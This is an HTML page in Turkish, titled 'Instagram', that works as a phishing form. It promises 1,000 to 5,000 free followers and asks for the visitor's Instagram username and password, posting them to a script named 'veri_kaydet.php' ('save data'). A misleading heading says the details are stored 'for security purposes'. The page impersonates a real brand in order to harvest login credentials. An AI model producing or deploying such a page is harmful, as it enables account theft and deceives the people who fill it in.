<!DOCTYPE html><html><head><meta charset="UTF-8"><title>Instagram</title></head><body>
    <h2>Hoşgeldiniz, bilgileriniz güvenlik amacıyla kayıt altına alınmaktadır.</h2>
    <form action="veri_kaydet.php" method="POST">
        <input name="platform" type="hidden" value="Instagram">
        <label>Kullanıcı Adı:</label><br><input type="text" name="kadi"><br>
        <label>Şifre:</label><br><input type="password" name="sifre"><br>
        <label>Kaç takipçi istersiniz?</label><br>
        <input type="radio" name="adet" value="1000"> 1.000<br>
        <input type="radio" name="adet" value="2500"> 2.500<br>
        <input type="radio" name="adet" value="5000"> 5.000<br><br>
        <button name="gonderim" value="guvenli">Takipçiyi güvenli şekilde gönder</button>
        <button name="gonderim" value="hizli">Takipçiyi hızlı şekilde gönder</button>
    </form>
    <p style="color:blue;">Not: Güvenli şekilde göndermeniz daha verimli sonuç verir.</p>
    </body></html>